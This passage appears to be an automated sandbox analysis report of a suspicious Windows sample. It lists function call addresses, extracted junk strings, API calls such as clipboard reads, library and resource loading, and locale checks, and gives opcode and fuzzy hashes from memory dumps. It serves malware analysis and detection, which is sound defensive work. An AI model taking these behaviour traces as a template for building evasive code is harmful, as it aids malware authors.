0x013eb95f
0x013eb96a
0x013eb975
0x013eb980
0x013eb987
0x013eb98e
0x013eb98e
0x013eb98e
0x013eb992
0x013eb997
0x013eb997
0x013eb997
0x013eb99c
0x013eb99c
0x013eb99c
0x013eb9a2
0x00000000
0x00000000
0x013eb9a8
0x013eb9a8
0x013ebaa0
0x013ebaa7
0x013ebaa9
0x013ebaab
0x013ebab2
0x013ebab2
0x013ebaad
0x013ebaad
0x013ebaad
0x013ebad9
0x013ebade
0x013ebae3
0x013ebaeb
0x013eb98e
0x013eb98e
0x013eb98e
0x013eb992
0x00000000
0x013eb992
0x013eb9ae
0x013eb9b4
0x013eba2f
0x013eba39
0x013eba40
0x013eba47
0x013eba5c
0x013eba68
0x013eba7d
0x013eba84
0x013eba89
0x013eba8e
0x013eba91
0x013eba96
0x00000000
0x013eb9b6
0x013eb9bc
0x013ebdb8
0x013eb9c2
0x013eb9c8
0x013eba25
0x00000000
0x013eb9ca
0x013eb9d0
0x013eba13
0x013eba18
0x013eba1b
0x013eba1b
0x013eb98e
0x013eb98e
0x013eb98e
0x013eb992
0x00000000
0x013eb992
0x013eb9d2
0x013eb9d9
0x013ebd8d
0x013ebd8d
0x013ebd93
0x013ebd95
0x00000000
0x013ebd95
0x013eb9df
0x013eb9e8
0x013eb9ef
0x013eb9f6
0x013eb9f7
0x013eb98e
0x013eb98e
0x013eb98e
0x013eb992
0x013eb997
0x013eb997
0x013eb99c
0x013eb99c
0x013eb99c
0x013eb9a2
0x00000000
0x00000000
0x00000000
0x013eb9a2
0x00000000
0x013eb99c
0x013eb98e
0x013eb9d9
0x013eb9d0
0x013eb9c8
0x013eb9bc
0x013eb9b4
0x013ebdc3
0x013ebdcc
0x00000000
0x013ebaf6
0x013ebaf6
0x013ebafc
0x013ebd88
0x00000000
0x013ebb02
0x013ebb02
0x013ebb08
0x013ebd79
0x013ebd80
0x00000000
0x013ebb0e
0x013ebb0e
0x013ebb14
0x013ebd50
0x013ebd55
0x013ebd58
0x013eb98e
0x013eb98e
0x013eb98e
0x013eb992
0x00000000
0x013eb992
0x013ebb1a
0x013ebb1a
0x013ebb1c
0x013ebb86
0x013ebb89
0x013ebbb5
0x013ebb8b
0x013ebb8b
0x013ebba0
0x013ebbac
0x013ebbac
0x013ebbfb
0x013ebc02
0x013ebc02
0x013ebc04
0x013ebc06
0x013ebc06
0x013ebc59
0x013ebc6a
0x013ebc6f
0x013ebc72
0x013ebc74
0x00000000
0x013ebc7a
0x013ebc97
0x013ebcab
0x013ebcb0
0x013ebcb3
0x013ebcb5
0x013ebce5
0x013ebcfc
0x013ebcfc
0x013ebcfc
0x013ebd24
0x013ebd29
0x013ebd29
0x013ebd2c
0x013eb98e
0x013eb98e
0x013eb98e
0x013eb992
0x00000000
0x013eb992
0x013eb98e
0x00000000
0x013ebb1e
0x013ebb1e
0x013ebb20
0x00000000
0x013ebb26
0x013ebb5f
0x013ebb64
0x013ebb67
0x013ebb6b
0x013ebb72
0x013ebb77
0x00000000
0x013ebb77
0x013ebb20
0x013ebb1c
0x013ebb14
0x013ebb08
0x00000000
0x013ebafc
0x013eb99c
0x013eb997

Strings

fQq!, xrefs: 013EB954
d=`, xrefs: 013EB58A
("', xrefs: 013EB2FF
}0, xrefs: 013EB611
fQq!, xrefs: 013EB945
uc, xrefs: 013EB89D
]a, xrefs: 013EB065
$, xrefs: 013EB13B
GK, xrefs: 013EB173
]#,, xrefs: 013EB162
Na!, xrefs: 013EB01B
z|, xrefs: 013EB203
? [, xrefs: 013EAD72
]a, xrefs: 013EB6CF
ev6, xrefs: 013EB3A5
{, xrefs: 013EB37C
d=`, xrefs: 013EB56D
b, xrefs: 013EB8BE

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: ("'$? [$GK$]#,$d=`$d=`$ev6$fQq!$fQq!$uc$z|$$$Na!$]a$]a$b${$}0
API String ID: 0-1223376802
Opcode ID: 75db6e7cac23269d8d60f78235ec174f69529d9caa9e00a0ac7f4d07354afd17
Instruction ID: f9deda6297ace3c59c5b0e4c36b79b5f74a045159c27a7e557098b42d58e4969
Opcode Fuzzy Hash: 75db6e7cac23269d8d60f78235ec174f69529d9caa9e00a0ac7f4d07354afd17
Instruction Fuzzy Hash: 5882FF715083818FD7B9CF25C54AA9BFBE1BBD4308F108A1DE6DA96260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013E5AB2, Relevance: 21.8, Strings: 17, Instructions: 590COMMON

Download Yara Rule

Strings

1/#, xrefs: 013E6464
<:t, xrefs: 013E5F6A
N%, xrefs: 013E5DCA
n*), xrefs: 013E616E
Nd;, xrefs: 013E5EC2
%, xrefs: 013E6008
\8, xrefs: 013E5C59
OJX, xrefs: 013E6239
Z, xrefs: 013E60E1
\59, xrefs: 013E65B5
]f), xrefs: 013E612F
`]gL, xrefs: 013E620D
$i, xrefs: 013E63C4
4T`, xrefs: 013E6270
\59, xrefs: 013E654A
r^U, xrefs: 013E5EF4
Lv, xrefs: 013E608F

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: N%$1/#$4T`$<:t$Nd;$OJX$Z$\59$\59$\8$]f)$`]gL$n*)$r^U$$i$%$Lv
API String ID: 0-3581384141
Opcode ID: d8f2c5004be884a3609b0bb98592a32136f53935ee7a3e314d64ff4ea537049a
Instruction ID: 6aef28cdfa8c3a815a55ed791d37479b114a9c62ded42efdfc80029c685510e1
Opcode Fuzzy Hash: d8f2c5004be884a3609b0bb98592a32136f53935ee7a3e314d64ff4ea537049a
Instruction Fuzzy Hash: 8862F0B15083819BD379CF25C58AB8FBBE2BBD4308F108A1DE5D986260D7B19549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 013F7ED1, Relevance: 20.7, Strings: 16, Instructions: 706COMMON

Download Yara Rule

Strings

nz , xrefs: 013F7F7D
<, xrefs: 013F8705
IMpT, xrefs: 013F855F
V*, xrefs: 013F85E7
61g, xrefs: 013F8823
9J, xrefs: 013F8575
H, xrefs: 013F8B6D
2k2, xrefs: 013F87C6
e, xrefs: 013F83D3
[8, xrefs: 013F8027
xt\}, xrefs: 013F867D
)@d, xrefs: 013F86D2
bV, xrefs: 013F8BA0
if,, xrefs: 013F87A5
xsX, xrefs: 013F8726
8*O, xrefs: 013F8A93

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: )@d$2k2$61g$8*O$9J$H$IMpT$V*$[8$bV$e$if,$nz $xsX$xt\}$<
API String ID: 0-3960585842
Opcode ID: 78368bd75cacb75d8cd4bb22d27fc061ff22350f5e088a7e43ecae103677625b
Instruction ID: 9d4135091771c6abee74b1f3c2cab0de7385d0730f2364bea6178101f7798b59
Opcode Fuzzy Hash: 78368bd75cacb75d8cd4bb22d27fc061ff22350f5e088a7e43ecae103677625b
Instruction Fuzzy Hash: 4092FE715093818FD379CF65C88AB9BBBE1BBC5308F10891DE6DA86260D7B18949CF47

Uniqueness

Uniqueness Score: -1.00%

Function 6E4B5EE0, Relevance: 19.9, APIs: 13, Instructions: 427threadclipboardCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6183
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B61A1
AnyPopup.USER32 ref: 6E4B6305
GetCurrentThread.KERNEL32 ref: 6E4B6401

Part of subcall function 6E4B5A30: IsSystemResumeAutomatic.KERNEL32 ref: 6E4B5BA0

GetUserDefaultUILanguage.KERNEL32(00000000,?,0000002E,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6355

Part of subcall function 6E4B5A30: GetOpenClipboardWindow.USER32(00000000,?,00000000,6E4B6431,0000002E,00000000,00000000,?,0000002E,00000000), ref: 6E4B5A3C
Part of subcall function 6E4B5A30: CloseClipboard.USER32 ref: 6E4B5A73
Part of subcall function 6E4B5A30: GetMenuCheckMarkDimensions.USER32 ref: 6E4B5B30

GetErrorMode.KERNEL32(0000002E,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6448
GetThreadErrorMode.KERNEL32(?,?,?,?,?,?,6E4B6935), ref: 6E4B64B0
GetClipboardViewer.USER32 ref: 6E4B5F76

Part of subcall function 6E4B5C20: UnregisterApplicationRestart.KERNEL32 ref: 6E4B5C40
Part of subcall function 6E4B5C20: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5CAC

GetSystemDefaultLangID.KERNEL32 ref: 6E4B5FE3
GetOpenClipboardWindow.USER32(?,-00000003,00000000,?,?,?,?,?,?,6E4B6935), ref: 6E4B6052
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B6081
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B6108
GetCurrentThread.KERNEL32 ref: 6E4B612E

Part of subcall function 6E4B5D90: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6E4B5E04
Part of subcall function 6E4B5D90: SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 6E4B5E74
Part of subcall function 6E4B5D90: GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 6E4B5E93
Part of subcall function 6E4B5D90: GetACP.KERNEL32(00000000,?,?,?), ref: 6E4B5EA4

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: ClipboardUnothrow_t@std@@@__ehfuncinfo$??2@$ThreadWindow$Open$CurrentDefaultErrorModeSystem$ApplicationAutomaticCheckCloseDimensionsForegroundLangLanguageMarkMenuPopupRestartResumeSwitchUnregisterUserViewer
String ID:
API String ID: 2542842856-0
Opcode ID: 4529080fb63c7c27641d4359eafb99e9d88c1dadcd017f67932a2f09eafa0ac7
Instruction ID: a478c5c069cad7eff5c02875c5e5dff46b8cc7bde0fe53061516278d9deebea1
Opcode Fuzzy Hash: 4529080fb63c7c27641d4359eafb99e9d88c1dadcd017f67932a2f09eafa0ac7
Instruction Fuzzy Hash: A4E12831D24F444AC613DEB694115ABF3AF6FEF6C4F048B2BF406B6152FB2598E28590

Uniqueness

Uniqueness Score: -1.00%

Function 013E758F, Relevance: 19.5, Strings: 15, Instructions: 734COMMON

Download Yara Rule

Strings

fW, xrefs: 013E7671
f/M, xrefs: 013E7C85
-&, xrefs: 013E81D2
5(y, xrefs: 013E7AFD
J, xrefs: 013E8279
]q<x, xrefs: 013E7709
j, xrefs: 013E802F
~J , xrefs: 013E7D53
}j, xrefs: 013E7ADB
, xrefs: 013E77AA
(_C, xrefs: 013E7F9C
`dF, xrefs: 013E81DD
0x, xrefs: 013E7B25
%2?, xrefs: 013E800B
}i, xrefs: 013E82AE

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: $ J$%2?$(_C$-&$0x$5(y$]q<x$`dF$f/M$fW$j$}i$}j$~J
API String ID: 0-1192029311
Opcode ID: 50421d684774182dec42ddf5ad3488188158801b0a226b8d758fdf253fe5e509
Instruction ID: 30522bcc4239d2c9e685b12fd633d4f908afd6eb777afc2ba4db9db3c6f5f38b
Opcode Fuzzy Hash: 50421d684774182dec42ddf5ad3488188158801b0a226b8d758fdf253fe5e509
Instruction Fuzzy Hash: 4B92F0715093818FD3B9CF65C58AB8BBBE1BBD5308F10891DE2CA96260D7B58949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013EEC27, Relevance: 17.8, Strings: 14, Instructions: 344COMMON

Download Yara Rule

Strings

LMe, xrefs: 013EEE6E
}G`, xrefs: 013EF17C
}G`, xrefs: 013EF29B
qQ, xrefs: 013EF2A0
}G`, xrefs: 013EF09E
>S, xrefs: 013EEE8B
{2, xrefs: 013EEE21
0d, xrefs: 013EEC8D
7Is, xrefs: 013EF03C
qQ, xrefs: 013EF296
!kP, xrefs: 013EECF8
}G`, xrefs: 013EF23B
y0D, xrefs: 013EEF42
@EQ, xrefs: 013EF077

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID: lstrcmpi
String ID: qQ$qQ$!kP$0d$7Is$@EQ$LMe$y0D${2$}G`$}G`$}G`$}G`$>S
API String ID: 1586166983-321775154
Opcode ID: 4432949b3625c3a6ca0aa6d4db7cdc719d20a72bfdfe012146b83b6a5eeba396
Instruction ID: b942399f056aebf29a7b90728c7ee03526a4066c8839b67e63b6f0e435f6d2f3
Opcode Fuzzy Hash: 4432949b3625c3a6ca0aa6d4db7cdc719d20a72bfdfe012146b83b6a5eeba396
Instruction Fuzzy Hash: E3F140715083809FD368CF29C58A65BFFE5FBC4758F108A1DF29A862A0D7B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 013F1F6B, Relevance: 16.9, Strings: 13, Instructions: 604COMMON

Download Yara Rule

Strings

c, xrefs: 013F2854
1{R, xrefs: 013F2693
B=&, xrefs: 013F27B1
;>-, xrefs: 013F287F
[ao, xrefs: 013F202B
s, xrefs: 013F2545
~1, xrefs: 013F24E8
t-!, xrefs: 013F1FCB
O;0, xrefs: 013F2931
[S+, xrefs: 013F22C9
(., xrefs: 013F225D
2Y, xrefs: 013F26C7
)c', xrefs: 013F286F

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: s$)c'$1{R$2Y$;>-$B=&$O;0$[ao$[S+$c$t-!$~1$(.
API String ID: 0-3687093388
Opcode ID: e6b12f019b1e549e829e4fb943f3269fa914e1eeed4e99cd887d34483f642bd8
Instruction ID: 20d00a864e582207c6e0516613fbbcbfd6d562a93a7e6219c7cf2245e0dea3da
Opcode Fuzzy Hash: e6b12f019b1e549e829e4fb943f3269fa914e1eeed4e99cd887d34483f642bd8
Instruction Fuzzy Hash: 3772FF71508381CBE378CF24C54AB9BBBE1BBD4348F10891DE6DA96260D7B19949CF53

Uniqueness

Uniqueness Score: -1.00%

Function 013E441E, Relevance: 15.3, Strings: 12, Instructions: 329COMMON

Download Yara Rule

Strings

}L~, xrefs: 013E4757
]jP, xrefs: 013E491E
Pe, xrefs: 013E4854
E>&, xrefs: 013E447B
|BC, xrefs: 013E4813
bK, xrefs: 013E45FD
3I, xrefs: 013E487A
]jP, xrefs: 013E4AB2
}, xrefs: 013E4657
.~P, xrefs: 013E46FF
'N2, xrefs: 013E444E
UKR, xrefs: 013E4710

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: .~P$3I$E>&$Pe$UKR$]jP$]jP$bK$|BC$}L~$'N2$}
API String ID: 0-887363794
Opcode ID: c45b7121bd240d64b965467fa5aec7fc84cd352af931a41f3bce9ce6b3970f99
Instruction ID: 8dfc8620dae2470d340951ce5a6898c175abfcf837bd2b8ade3daa84ec36ec2e
Opcode Fuzzy Hash: c45b7121bd240d64b965467fa5aec7fc84cd352af931a41f3bce9ce6b3970f99
Instruction Fuzzy Hash: 49F112715083809FD368DF25C98AA5BBBF1BBC8398F108A1DF1DA96260D7B18549CF47

Uniqueness

Uniqueness Score: -1.00%

Function 013FBFE8, Relevance: 14.2, Strings: 11, Instructions: 420COMMON

Download Yara Rule

Strings

"k, xrefs: 013FC4F7
(Z, xrefs: 013FC441
Kn?, xrefs: 013FC272
N#/y, xrefs: 013FC03D
I!K, xrefs: 013FC62B
@cK, xrefs: 013FC68B
{/, xrefs: 013FC5C2
+b, xrefs: 013FC82B
+b, xrefs: 013FC70D
FV, xrefs: 013FC34B
1#[, xrefs: 013FC2BE

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: +b$ +b$"k$(Z$1#[$@cK$FV$I!K$Kn?$N#/y${/
API String ID: 0-1219850661
Opcode ID: 0a70bd03a88d52fcaac3085c05ec6e300bd642e83525073fef30b163da1acd2c
Instruction ID: 426e9efb8b35edfb42399b017c7c19ffe5664a380259f4b0bff01ad6d2bbf70e
Opcode Fuzzy Hash: 0a70bd03a88d52fcaac3085c05ec6e300bd642e83525073fef30b163da1acd2c
Instruction Fuzzy Hash: 1A3225715093809FD3A8CF25C98AA8BFBE1FBD4758F10891DE2C996260D7B59949CF03

Uniqueness

Uniqueness Score: -1.00%

Function 013ED223, Relevance: 14.1, Strings: 11, Instructions: 367COMMON

Download Yara Rule

Strings

lMr, xrefs: 013ED2B5
a$c, xrefs: 013ED6C4
_;Y, xrefs: 013ED378
@`, xrefs: 013ED8E3
, xrefs: 013ED8C7
VX, xrefs: 013ED443
"E, xrefs: 013ED407
8, xrefs: 013ED2AD
@`, xrefs: 013ED719
lQm, xrefs: 013ED5A2
`qJ7, xrefs: 013ED5DC

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: $"E$@`$@`$_;Y$`qJ7$a$c$lMr$lQm$VX$8
API String ID: 0-1043295566
Opcode ID: 816dba574116be04c69ae3083619c3268acc96dc46c510461b1f3c3ca6c586f7
Instruction ID: 98333729bf1b263432c5f23a1ca8ca20c694e00b209004a14d80552e7d43ba0e
Opcode Fuzzy Hash: 816dba574116be04c69ae3083619c3268acc96dc46c510461b1f3c3ca6c586f7
Instruction Fuzzy Hash: DB1230B10083818FD768CF65C589A5FFBE1FBC4748F108A1DE69A962A0D7B19948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 0140292B, Relevance: 14.0, Strings: 11, Instructions: 257COMMON

Download Yara Rule

Strings

"IA, xrefs: 01402C86
5A, xrefs: 01402BBD
-Op, xrefs: 01402BDE
> , xrefs: 01402A5A
0s=, xrefs: 01402D8D
;, xrefs: 01402AD8
8{5, xrefs: 01402A40
Ia, xrefs: 01402A23
%-?, xrefs: 01402CB7
BZ$, xrefs: 014029DD
0s=, xrefs: 01402D14

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: "IA$%-?$-Op$0s=$0s=$5A$8{5$> $BZ$$Ia$;
API String ID: 0-1228380503
Opcode ID: af1f7d1fbe28d8e81f439e1a6534727ad2a21fb030f042be4395cae9d5fa1560
Instruction ID: f51e141f447f3a5e0984102164b697fb3c8ea3277408ff989af9c0c23d03bf0b
Opcode Fuzzy Hash: af1f7d1fbe28d8e81f439e1a6534727ad2a21fb030f042be4395cae9d5fa1560
Instruction Fuzzy Hash: 3FD111B14083819FC769CF65C58995BBBF1FFC4758F50891DF296862A0C7B18949CF82

Uniqueness

Uniqueness Score: -1.00%

Function 013FB397, Relevance: 12.8, Strings: 10, Instructions: 321COMMON

Download Yara Rule

Strings

,:6, xrefs: 013FB7CF
o*, xrefs: 013FB778
[,#, xrefs: 013FB51B
_L, xrefs: 013FB8B9
vC3, xrefs: 013FB5BD
U, xrefs: 013FB435
v?, xrefs: 013FB5EB
zo, xrefs: 013FB479
N3?, xrefs: 013FB90C
/, xrefs: 013FB894

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: /$,:6$N3?$[,#$_L$o*$vC3$zo$v?$U
API String ID: 0-2508983956
Opcode ID: 0fa2ff52b6c0816e122cf084c1640724b92509bb5b1db039c5c13b80a731c1c9
Instruction ID: ef14f4940928f8d240d6a2c6e9702640206da6073867393915b542f5fdebda38
Opcode Fuzzy Hash: 0fa2ff52b6c0816e122cf084c1640724b92509bb5b1db039c5c13b80a731c1c9
Instruction Fuzzy Hash: 6902E2B14083819FE3A9CF21C48AA5BFBE1FBC5358F108A1DE5D986260D7B49949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013F44AA, Relevance: 12.8, Strings: 10, Instructions: 316COMMON

Download Yara Rule

Strings

SJT, xrefs: 013F4640
>z, xrefs: 013F47BD
mF2, xrefs: 013F46D7
sr{, xrefs: 013F4930
nY, xrefs: 013F46DF
[X@, xrefs: 013F4871
rw, xrefs: 013F4965
-u, xrefs: 013F49DB
^rnd, xrefs: 013F4802
O, xrefs: 013F46F9

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: mF2$-u$>z$O$SJT$[X@$^rnd$nY$rw$sr{
API String ID: 0-1390466442
Opcode ID: 693e3809b036b115bfbd88d0e2f1aea2e72da238af9f2eab22a3c8aef8cbddb0
Instruction ID: b7d6a5ac21afe037e6524931dfe25c71bc55525a4579607ae3d5e12cd464fad7
Opcode Fuzzy Hash: 693e3809b036b115bfbd88d0e2f1aea2e72da238af9f2eab22a3c8aef8cbddb0
Instruction Fuzzy Hash: 7DF11D725093809FD3A9CF65C58AA5BFBE1BBC4748F10890DF2D9862A0D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 013E8C09, Relevance: 11.6, Strings: 9, Instructions: 322COMMON

Download Yara Rule

Strings

y&, xrefs: 013E8E12
$^;, xrefs: 013E8F21
y&, xrefs: 013E8DFB
O|L, xrefs: 013E8CC7
09, xrefs: 013E917C
4y&, xrefs: 013E8D84
>@, xrefs: 013E9169
z], xrefs: 013E8D3A
yM", xrefs: 013E8D1D

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: $^;$09$4y&$>@$O|L$y&$y&$yM"$z]
API String ID: 0-2859082777
Opcode ID: 9aff169dd2dd6c9c02829c1184751b808a291760433baacb3c52021238f94057
Instruction ID: 61b0d22d69ba190e46d2855fa822bf40bb0d3f825d8542662d5b1ebb7af5d66b
Opcode Fuzzy Hash: 9aff169dd2dd6c9c02829c1184751b808a291760433baacb3c52021238f94057
Instruction Fuzzy Hash: 24020F724083819FD7A9CF25C58AA8FFBE1BBD4758F108A0DE1D996260D7B18949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 6E4BEBD0, Relevance: 10.7, APIs: 7, Instructions: 162libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000060), ref: 6E4BEC5D
LoadLibraryExW.KERNEL32(?,00000000,00000002), ref: 6E4BEC6F
FindResourceW.KERNEL32(00000000,?,?), ref: 6E4BEC96
LoadResource.KERNEL32(00000000,00000000), ref: 6E4BECAE

Part of subcall function 6E4BE270: GetLastError.KERNEL32(6E4BED79), ref: 6E4BE270

FreeLibrary.KERNEL32(00000000,00000000,?), ref: 6E4BED9F

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: LibraryLoad$Resource$ErrorFindFreeLast
String ID:
API String ID: 328770362-0
Opcode ID: f62784d23e01e4debd9f7227640f63195c9b2aadb4e97d8b23f2837c45691f2f
Instruction ID: 502d61e3475ec7ca14e930e2d743ff0b709cecfae66413952bfde60e47069ab8
Opcode Fuzzy Hash: f62784d23e01e4debd9f7227640f63195c9b2aadb4e97d8b23f2837c45691f2f
Instruction Fuzzy Hash: 2851E4B1A0021EDFDB20CBB4CC80F9D77B8EF89714F1005DAF609A7241D7709A418BA9

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E5F10, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 86COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,00000000,?,?,?,6E4E622F,?,00000000), ref: 6E4E5FA9
GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,00000000,?,?,?,6E4E622F,?,00000000), ref: 6E4E5FD2
GetACP.KERNEL32(?,?,6E4E622F,?,00000000), ref: 6E4E5FE7

Strings

OCP, xrefs: 6E4E5F64
/bNn, xrefs: 6E4E5FC7, 6E4E5F9E
ACP, xrefs: 6E4E5F2E

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: /bNn$ACP$OCP
API String ID: 2299586839-3341605620
Opcode ID: 19c734c7416ce6f3209004bd978e1d27d4c2736c98881e09d518b77c19e89b2f
Instruction ID: f3dd5ea471c9f2b488b92786d1fc727844dd679b88df1e52a75737cb73f2e817
Opcode Fuzzy Hash: 19c734c7416ce6f3209004bd978e1d27d4c2736c98881e09d518b77c19e89b2f
Instruction Fuzzy Hash: F221D332A14205ABE7688FF5C904E8773B6AB45B62B528466E809CBB08FB36DD41C350

Uniqueness

Uniqueness Score: -1.00%

Function 013EF41F, Relevance: 10.3, Strings: 8, Instructions: 333COMMON

Download Yara Rule

Strings

E3, xrefs: 013EF6F4
g,, xrefs: 013EF496
G8n, xrefs: 013EF49E
WL, xrefs: 013EF51F
c, xrefs: 013EF72A
)h?;, xrefs: 013EF471
<ix, xrefs: 013EF5D7
_, xrefs: 013EF7A0

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: )h?;$<ix$E3$G8n$WL$c$g,$_
API String ID: 0-720653590
Opcode ID: e68d3720c2b7e0ebb1525c455301385dc93292ff74929fcb8f0bcff079d8d71d
Instruction ID: 037295a7eb8146cb876db81a5699190604df67174ea53ce5a367d7598833eae4
Opcode Fuzzy Hash: e68d3720c2b7e0ebb1525c455301385dc93292ff74929fcb8f0bcff079d8d71d
Instruction Fuzzy Hash: EDF110714093819FE368CF65C48AA4BFBE5BBC4748F00891DF29A96260D7B59909CF53

Uniqueness

Uniqueness Score: -1.00%

Function 013EFEA0, Relevance: 10.2, Strings: 8, Instructions: 250COMMON

Download Yara Rule

Strings

vd;, xrefs: 013EFF5B
_g, xrefs: 013F00B4
*s, xrefs: 013F00D4
%Y, xrefs: 013EFED0
L, xrefs: 013EFF2E
X{, xrefs: 013EFFB9
JU, xrefs: 013F0097
BwO, xrefs: 013F0011

Memory Dump Source

Source File: 00000000.00000002.765499024.00000000013E0000.00000040.00000001.sdmp, Offset: 013E0000, based on PE: true

Similarity

API ID:
String ID: %Y$*s$BwO$JU$X{$vd;$_g$L
API String ID: 0-2451716437
Opcode ID: 88fef4edf0e6810445421c131e1e4d8ea0dc1f2bed6c259d09e07c08325f3035
Instruction ID: c02a0313316c754a2931e2c628876135f5ef2e41f23b3875032f4a5ff1fa6ae5
Opcode Fuzzy Hash: 88fef4edf0e6810445421c131e1e4d8ea0dc1f2bed6c259d09e07c08325f3035
Instruction Fuzzy Hash: 6FC11072408381AFC768CF69C88991BFBF2FB84758F509A1DF2D686260C3B18559CF46

Uniqueness

Uniqueness Score: -1.00%

Function 6E4E3074, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1400COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E4E31E6

Strings

1#QNAN, xrefs: 6E4E4418
1#INF, xrefs: 6E4E441F
1#IND, xrefs: 6E4E440A
1#SNAN, xrefs: 6E4E4411

Memory Dump Source

Source File: 00000000.00000002.765737324.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000000.00000002.765733095.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765779723.000000006E4EB000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.765803220.000000006E4FF000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.765811287.000000006E502000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 659b7a4ec8dd643fbb1042be93b60692bf475c8e280383cd1c81957fd08b92ac
Instruction ID: bf894602d5641f0ff1518c3bca9c2aa1f7878252d9d03b5cba2ba5d24337bb25
Opcode Fuzzy Hash: 659b7a4ec8dd643fbb1042be93b60692bf475c8e280383cd1c81957fd08b92ac
Instruction Fuzzy Hash: 7BC25872E086298FDB65CEB89C44BD9B3B5EB49346F1041EBD44DE7640E774AE828F40

Uniqueness

Uniqueness Score: -1.00%

Function 013EC5FE, Relevance: 9.1, Strings: 7, Instructions: 374COMMON

Download Yara Rule

Strings

